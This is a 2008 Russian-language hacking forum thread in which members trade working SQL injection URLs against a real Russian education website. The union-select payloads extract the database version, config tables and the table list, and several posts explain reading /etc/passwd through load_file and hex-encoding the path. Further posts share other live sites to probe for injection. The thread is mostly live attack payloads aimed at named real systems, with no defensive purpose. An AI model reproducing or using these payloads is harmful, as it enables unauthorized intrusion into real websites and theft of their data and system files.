HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 233 из 2422 « Первая < 133183223 229 230 231 232 233 234 235 236 237 2432833337331233 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.06.2008, 12:36
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
2 sakh_rider
Только смотри внимательно,вывод есть,но не как обычно

_http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=1+union+select+1,2,@@version+--+

5.0.51a
ege@pro.iot.ru
 
Ответить с цитированием

  #2  
Старый 14.06.2008, 12:42
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296

Репутация: 2
По умолчанию
Цитата:
Сообщение от jokester  
2 sakh_rider
Только смотри внимательно,вывод есть,но не как обычно

_http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=1+union+select+1,2,@@version+--+

5.0.51a
ege@pro.iot.ru
Ух ты, я действительно сразу не заметил, все думал что ето за циферки в адрес лезут... Эхх.. сенкс +
 
Ответить с цитированием

  #3  
Старый 14.06.2008, 12:46
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+1,1--
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+2,1--
почему не подходит? =\
http://www1.ege.edu.ru/administrator/components/com_astatspro/administration/index.php?

а вообще, там около 150 таблиц, мне влом все перебирать
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(table_schema ,0x2e,table_name)+from+information_schema.tables+l imit+18,1--
вот эта с конфигом
 
Ответить с цитированием

  #4  
Старый 14.06.2008, 13:07
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296

Репутация: 2
По умолчанию
Цитата:
Сообщение от Piflit  
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+1,1--
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+2,1--
почему не подходит? =\
http://www1.ege.edu.ru/administrator/components/com_astatspro/administration/index.php?

а вообще, там около 150 таблиц, мне влом все перебирать
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(table_schema ,0x2e,table_name)+from+information_schema.tables+l imit+18,1--
вот эта с конфигом
Буду перебирать далее сенкс +)
 
Ответить с цитированием

  #5  
Старый 14.06.2008, 12:59
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию
http://la2.emserv.ru/indexx.php?start_from=10&ucat=&archive=&subaction= &id='&lang=ru можно че сделать? а то я уже совсем запутался ;(
 
Ответить с цитированием

  #6  
Старый 14.06.2008, 14:37
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296

Репутация: 2
По умолчанию
Еще вопросик: как можно ето "etc/passwd" превратить в нечто подобное
Код:
0 x какие-то_символы
. Как я понимаю это hex.
Кто-нить знает как можно закодировать?
А то обычный
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,load_file(ect/passwd)+from+ege_users+limit+2,1--
не показывает(
 
Ответить с цитированием

  #7  
Старый 14.06.2008, 14:42
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
1. http://hack-shop.org.ru/tools-code-encode
>SQL Hex + 0x | Path :

2. правильно load_file('/etc/passwd')
 
Ответить с цитированием

  #8  
Старый 14.06.2008, 14:42
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
sakh_rider
load_file('/etc/passwd') == load_file(0x272f6574632f70617373776427)
 
Ответить с цитированием

  #9  
Старый 14.06.2008, 15:08
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
вообще то в хексе без ковычек)
 
Ответить с цитированием

  #10  
Старый 14.06.2008, 20:22
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
Провел на форуме:
3186852

Репутация: 316


Отправить сообщение для Vid0k с помощью ICQ
По умолчанию
чо делать вот с этим http://www.uniway.be/reference.aspx?id=221'
 
Ответить с цитированием
Ответ
Страница 233 из 2422 « Первая < 133183223 229 230 231 232 233 234 235 236 237 2432833337331233 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ